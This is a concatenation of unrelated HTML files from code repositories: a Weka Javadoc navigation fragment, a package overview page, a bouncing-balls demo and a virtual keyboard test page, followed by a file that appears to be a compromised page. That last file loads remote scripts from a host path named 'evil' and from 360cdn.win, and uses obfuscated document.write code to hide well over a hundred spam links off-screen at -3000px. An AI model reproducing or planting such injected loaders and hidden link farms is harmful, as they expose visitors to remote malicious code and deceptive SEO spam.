target="_blank"><FONT CLASS="NavBarFont1"><B>Weka's home</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;<A HREF="../../../weka/classifiers/package-summary.html"><B>PREV PACKAGE</B></A>&nbsp; &nbsp;<A HREF="../../../weka/classifiers/bayes/blr/package-summary.html"><B>NEXT PACKAGE</B></A></FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../index.html?weka/classifiers/bayes/package-summary.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="package-summary.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> </BODY> </HTML>
src/javadoc/org/acmsl/commons/package.html
rydnr/java-commons
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta name="Abstract" content="Overview"/> <meta name="Author" content="jsanleandro@yahoo.es"/> <meta name="Keywords" content="Javadoc, Java, Software Engineering"/> <meta name="Description" content="Overview"/> <meta name="Distribution" content="Global" /> <meta http-equiv="Content-Language" content="EN"/> <meta name="robots" content="index,follow" /> <meta name="Revisit-After" content="7 Days" /> <title></title> <link rel="schema.DC" href="http://purl.org/dc/" /> <meta name="DC.Subject" xml:lang="en" lang="en" content="Javadoc, Java, Software Engineering"/> <meta name="DC.Title" xml:lang="en" lang="en" content="Overview"/> <meta name="DC.Description.Abstract" xml:lang="en" lang="en" content="Overview"/> <meta name="DC.Date.Created" content="2003-11-01"/> <meta name="DC.Language" content="en"/> <meta name="DC.Creator" content="jsanleandro@yahoo.es"/> <meta name="DC.Publisher" content="ACM-SL"/> <link rel="Copyright" href="LICENSE.txt"/> <link rel="Copyright" href="COPYING.txt"/> <link rel="stylesheet" type="text/css" href="css/base.css"/> <link rel="stylesheet" type="text/css" href="css/custom.css"/> <link rel="stylesheet" type="text/css" media="print" href="css/print.css"/> </head> <body> Contains all classes/interfaces of ACM-SL Commons. <address>jsanleandro@yahoo.es</address> <!-- hhmts start --> Last modified: Sun Nov 16 14:22:16 CET 2003 <!-- hhmts end --> </body> </html>
balls.html
CHENPINGCAI/CHENPINGCAI.github.io
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Boll</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" type="text/css" media="screen" href="main.css" /> <script src="main.js"></script> <style> * { margin: 0; padding: 0 } #box { width: 500px; height: 500px; border: 3px solid greenyellow; position: relative; } .ball{ position: absolute; border-radius: 50%; } </style> </head> <body> <div id="box"></div> <script> //定义随机函数 function RandomNum(num1,num2){ return Math.floor(Math.random()*(num2-num1+1)+num1); } //构造小球函数 function Ball(){ this.ball = document.createElement("div"); const randomNum = RandomNum(20,50); this.width = 50 this.height = 50 this.left = RandomNum(0,box.offsetWidth-randomNum); this.top = RandomNum(0,box.offsetHeight-randomNum); this.backgroundColor = "red" this.tempX = this.left; this.tempY = this.top; } Ball.prototype.draw = function(){ this.ball.style.width = this.width + "px"; this.ball.style.height = this.height + "px"; this.ball.className = "ball"; this.ball.style.left = this.tempX + "px"; this.ball.style.top = this.tempY + "px"; this.ball.style.backgroundColor = this.backgroundColor; box.appendChild(this.ball); } //产生小球 const balls=[]; // 你要产生几个小球? let count = 20 while(count > 0) { const ball=new Ball(); // if (balls.length === 0) { // // ball.draw() // count -= 1 // } const { left, top } = ball const canIDraw = balls.every(b => { return Math.hypot(b.left - ball.left, b.top - ball.top) > 50 }) if (canIDraw && (left < 450) && (top < 450)) { ball.draw() count -= 1 balls.push(ball); } } // for (var i = 0; i < 10; i++) { // console.log(1) // box.appendChild(balls[0]) // } console.log(balls) </script> </body> </html>
app/phpdesktop-chrome-31.8-php-5.6.1/jvk_src/1-vkboard/7-test-any-css.html
samurailens/sop
<HTML> <HEAD> <SCRIPT type="text/javascript" src="vkboard.js"></SCRIPT> <SCRIPT><!-- // This example shows the (still VERY experimental) way // of specifying the vkeyboard font size with not only "px", // but with any CSS length unit, i.e. %, em, ex, pt, pc, // in, cm and mm. // Parts of the following code are taken from the DocumentSelection // library (http://debugger.ru/projects/browserextensions/documentselection) // by Ilya Lebedev. DocumentSelection is distributed under LGPL license // (http://www.gnu.org/licenses/lgpl.html). // Look at the 'keyb_change' call in the very bottom of this // page to see how it works and try to change it. var opened = false, vkb = null, text = null, insertionS = 0, insertionE = 0; var userstr = navigator.userAgent.toLowerCase(); var safari = (userstr.indexOf('applewebkit') != -1); var gecko = (userstr.indexOf('gecko') != -1) && !safari; var standr = gecko || window.opera || safari; // This function is the "connector" from arbitrary length // units to "px" world. Parameters are: // // 'obj' - object, in which context we should determine // the px value from the size given in 'value'; // // 'value' - string, consisting of the numeric value and // the length unit designator. // function convert_to_px(obj, value) { // Inner function - retrieves the (default) font size // for the given object. function get_font_size(obj) { // Standard way: if(window.getComputedStyle) return window.getComputedStyle(obj, "").getPropertyValue("font-size"); // MS IE way: if(obj.currentStyle) return obj.currentStyle.fontSize; return "16px"; } var unit, valu, last = value.length ? value.substr(value.length - 1, 1) : ""; if(isNaN(last)) { var def = get_font_size(document.body); unit = def.substr(def.length - 2, 2), valu = def.substr(0, def.indexOf(unit)); switch(value) { case "xx-small": valu -= 3; break; case "x-small": valu -= 2; break; case "small": valu -= 1; break; case "medium": break; // already set case "large": valu += 1; break; case "x-large": valu += 2; break; case "xx-large": valu += 3; break; default: if(value.length) { unit = (last == "%") ? "%" : value.substr(value.length - 2, 2); valu = value.substr(0, value.indexOf(unit)); } } } else return value; if(unit == "px") return valu; // Below we have the main problem with the code. The problem is - // only MS IE has the facility ('window.screen.logicalXDPI' property) // to determine current screen DPI, which we need to convert values // from absolute length units (pt, pc, in, cm, mm) to pixels. // // Currently, no other browser has the way to retrieve the DPI, // so we have to use the "usual" value of 96 DPI (== 1.3333 pixels // per point), which is quite common for Windows machines. // // With browsers other than MS IE, only relative length units // (em, ex, % or px) can be used safely. // Pixels per point: var px_per_pt = window.screen.logicalXDPI ? (window.screen.logicalXDPI / 72.0) : 1.3333; // 'base_u' - base unit for current hierarchy level; // 'base_v' - base value for current hierarchy level; // var base_u, base_v = 1, obj_ = obj; do { var base = get_font_size(obj_); if(String(base).length) { var tmp = base.substr(base.length - 1, 1); if(isNaN(tmp)) { base_u = (tmp == "%") ? "%" : base.substr(base.length - 2, 2); base_v *= base.substr(0, base.indexOf(base_u)); if(base_u == "%") { base_v /= 100.0; } else if(base_u == "ex") { base_v /= 2.0; } else if(base_u == "em") { } else break; } else { base_u = "px"; base_v *= base; break; } } obj_ = obj_.parentNode; } while(obj_ != document.documentElement); if(!base_v) { base_v = 16; base_u = "px"; } switch(unit) { case "%": valu /= 50.0; case "ex": valu /= 2.0; case "em": valu *= base_v, unit = base_u; } switch(unit) { case "mm": valu *= 0.1; case "cm": valu *= 0.3937007874015748031496062992126; case "in": valu *= 6 case "pc": valu *= 12; case "pt": valu *= px_per_pt; } return valu; } function keyb_change(size) { document.getElementById("switch").innerHTML = (opened ? "Show keyboard" : "Hide keyboard"); opened = !opened; if(opened && !vkb) { var obj = document.getElementById("keyboard"); vkb = new VKeyboard("keyboard", // container's id keyb_callback, // reference to the callback function true, // create the arrow keys or not? (this and the following params are optional) true, // create up and down arrow keys? false, // reserved true, // create the numpad or not? "", // font name ("" == system default) convert_to_px(obj,size) + "px", // font size in px "#000", // font color "#F00", // font color for the dead keys "#FFF", // keyboard base background color "#FFF", // keys' background color "#DDD", // background color of switched/selected item "#777", // border color "#CCC", // border/font color of "inactive" key (key with no value/disabled) "#FFF", // background color of "inactive" key (key with no value/disabled) "#F77", // border color of the language selector's cell true, // show key flash on click? (false by default) "#CC3300", // font color during flash "#FF9966", // key background color during flash "#CC3300", // key border color during flash false, // embed VKeyboard into the page? true, // use 1-pixel gap between the keys? 0); // index(0-based) of the initial layout } else vkb.Show(opened); text = document.getElementById("textfield"); text.focus(); if(document.attachEvent) text.attachEvent("onblur", backFocus); } function backFocus() { if(opened) { var l = text.value.length; setRange(text, insertionS, insertionE); text.focus(); } } // Advanced callback function: // function keyb_callback(ch) { var val = text.value; switch(ch) { case "BackSpace": if(val.length) { var span = null; if(document.selection) span = document.selection.createRange().duplicate(); if(span && span.text.length > 0) { span.text = ""; getCaretPositions(text); } else deleteAtCaret(text); } break; case "<": if(insertionS > 0) setRange(text, insertionS - 1, insertionE - 1); break; case ">": if(insertionE < val.length) setRange(text, insertionS + 1, insertionE + 1); break; case "/\\": if(!standr) break; var prev = val.lastIndexOf("\n", insertionS) + 1; var pprev = val.lastIndexOf("\n", prev - 2); var next = val.indexOf("\n", insertionS); if(next == -1) next = val.length; var nnext = next - insertionS; if(prev > next) { prev = val.lastIndexOf("\n", insertionS - 1) + 1; pprev = val.lastIndexOf("\n", prev - 2); } // number of chars in current line to the left of the caret: var left = insertionS - prev; // length of the prev. line: var plen = prev - pprev - 1; // number of chars in the prev. line to the right of the caret: var right = (plen <= left) ? 1 : (plen - left); var change = left + right; setRange(text, insertionS - change, insertionE - change); break; case "\\/": if(!standr) break; var prev = val.lastIndexOf("\n", insertionS) + 1; var next = val.indexOf("\n", insertionS); var pnext = val.indexOf("\n", next + 1); if( next == -1) next = val.length; if(pnext == -1) pnext = val.length; if(pnext < next) pnext = next; if(prev > next) prev = val.lastIndexOf("\n", insertionS - 1) + 1; // number of chars in current line to the left of the caret: var left = insertionS - prev; // length of the next line: var nlen = pnext - next; // number of chars in the next line to the left of the caret: var right = (nlen <= left) ? 0 : (nlen - left - 1); var change = (next - insertionS) + nlen - right; setRange(text, insertionS + change, insertionE + change); break; default: insertAtCaret(text, (ch == "Enter" ? (window.opera ? '\r\n' : '\n') : ch)); } } // This function retrieves the position (in chars, relative to // the start of the text) of the edit cursor (caret), or, if // text is selected in the TEXTAREA, the start and end positions // of the selection. // function getCaretPositions(ctrl) { var CaretPosS = -1, CaretPosE = 0; // Mozilla way: if(ctrl.selectionStart || (ctrl.selectionStart == '0')) { CaretPosS = ctrl.selectionStart; CaretPosE = ctrl.selectionEnd; insertionS = CaretPosS == -1 ? CaretPosE : CaretPosS; insertionE = CaretPosE; } // IE way: else if(document.selection && ctrl.createTextRange) { var start = end = 0; try { start = Math.abs(document.selection.createRange().moveStart("character", -10000000)); // start if (start > 0) { try { var endReal = Math.abs(ctrl.createTextRange().moveEnd("character", -10000000)); var r = document.body.createTextRange(); r.moveToElementText(ctrl); var sTest = Math.abs(r.moveStart("character", -10000000)); var eTest = Math.abs(r.moveEnd("character", -10000000)); if ((ctrl.tagName.toLowerCase() != 'input') && (eTest - endReal == sTest)) start -= sTest; } catch(err) {} } } catch (e) {} try { end = Math.abs(document.selection.createRange().moveEnd("character", -10000000)); // end if(end > 0) { try { var endReal = Math.abs(ctrl.createTextRange().moveEnd("character", -10000000)); var r = document.body.createTextRange(); r.moveToElementText(ctrl); var sTest = Math.abs(r.moveStart("character", -10000000)); var eTest = Math.abs(r.moveEnd("character", -10000000)); if ((ctrl.tagName.toLowerCase() != 'input') && (eTest - endReal == sTest)) end -= sTest; } catch(err) {} } } catch (e) {} insertionS = start; insertionE = end } } function setRange(ctrl, start, end) { if(ctrl.setSelectionRange) // Standard way (Mozilla, Opera, Safari ...) { ctrl.setSelectionRange(start, end); } else // MS IE { var range; try { range = ctrl.createTextRange(); } catch(e) { try { range = document.body.createTextRange(); range.moveToElementText(ctrl); } catch(e) { range = null; } } if(!range) return; range.collapse(true); range.moveStart("character", start); range.moveEnd("character", end - start); range.select(); } insertionS = start; insertionE = end; } function deleteSelection(ctrl) { if(insertionS == insertionE) return; var tmp = (document.selection && !window.opera) ? ctrl.value.replace(/\r/g,"") : ctrl.value; ctrl.value = tmp.substring(0, insertionS) + tmp.substring(insertionE, tmp.length); setRange(ctrl, insertionS, insertionS); } function deleteAtCaret(ctrl) { // if(insertionE < insertionS) insertionE = insertionS; if(insertionS != insertionE) { deleteSelection(ctrl); return; } if(insertionS == insertionE) insertionS = insertionS - 1; var tmp = (document.selection && !window.opera) ? ctrl.value.replace(/\r/g,"") : ctrl.value; ctrl.value = tmp.substring(0, insertionS) + tmp.substring(insertionE, tmp.length); setRange(ctrl, insertionS, insertionS); } // This function inserts text at the caret position: // function insertAtCaret(ctrl, val) { if(insertionS != insertionE) deleteSelection(ctrl); if(gecko && document.createEvent && !window.opera) { var e = document.createEvent("KeyboardEvent"); if(e.initKeyEvent && ctrl.dispatchEvent) { e.initKeyEvent("keypress", // in DOMString typeArg, false, // in boolean canBubbleArg, true, // in boolean cancelableArg, null, // in nsIDOMAbstractView viewArg, specifies UIEvent.view. This value may be null; false, // in boolean ctrlKeyArg, false, // in boolean altKeyArg, false, // in boolean shiftKeyArg, false, // in boolean metaKeyArg, null, // key code; val.charCodeAt(0));// char code. ctrl.dispatchEvent(e); } } else { var tmp = (document.selection && !window.opera) ? ctrl.value.replace(/\r/g,"") : ctrl.value; ctrl.value = tmp.substring(0, insertionS) + val + tmp.substring(insertionS, tmp.length); } setRange(ctrl, insertionS + val.length, insertionS + val.length); } //--></SCRIPT></HEAD> <BODY> <P style="font-family:Tahoma;font-size:14px">Virtual keyboard test #7: specifying keyboard size with any CSS length unit.</P> <TABLE border="0" width="60%"> <TR> <TD width="100px"><TEXTAREA id="textfield" rows="12" cols="50" onkeyup="getCaretPositions(this);" onclick="getCaretPositions(this);"></TEXTAREA></TD> <TD width="10px"></TD><TD><DIV width="50px" align="justify">VKeyboard font size is set to '1em'. View page source to see how it works.</DIV></TD> </TR> </TABLE> <!-- VKeyboard font size is set to 1em. Change to see the effect. --> <P><A href="javascript:keyb_change('1em')" onclick="javascript:blur()" id="switch" style="font-family:Tahoma;font-size:14px;text-decoration:none;border-bottom: 1px dashed #0000F0;color:#0000F0">Show keyboard</A></P> <DIV id="keyboard"></DIV> </BODY></HTML>
images/Core2Duo/020411349a30vb.html
ForAEdesWeb/AEW2
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a> <a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a> <a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a> <a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a> <a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a> <a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a> <a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a> <a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a> <a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a> <a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a> <a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a> <a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a> <a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a> <a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a> <a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a> <a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a> <a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a> <a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a> <a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a> <a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a> <a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a> <a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a> <a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a> <a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a> <a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a> <a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a> <a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a> <a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a> <a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a> <a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a> <a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a> <a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a> <a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a> <a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a> <a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a> <a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a> <a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a> <a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a> <a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a> <a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a> <a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a> <a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a> <a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a> <a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a> <a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a> <a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a> <a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a> <a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a> <a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a> <a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a> <a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a> <a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a> <a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a> <a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a> <a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a> <a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a> <a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a> <a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a> <a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a> <a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a> <a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a> <a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a> <a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a> <a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a> <a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a> <a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a> <a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a> <a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a> <a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a> <a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a> 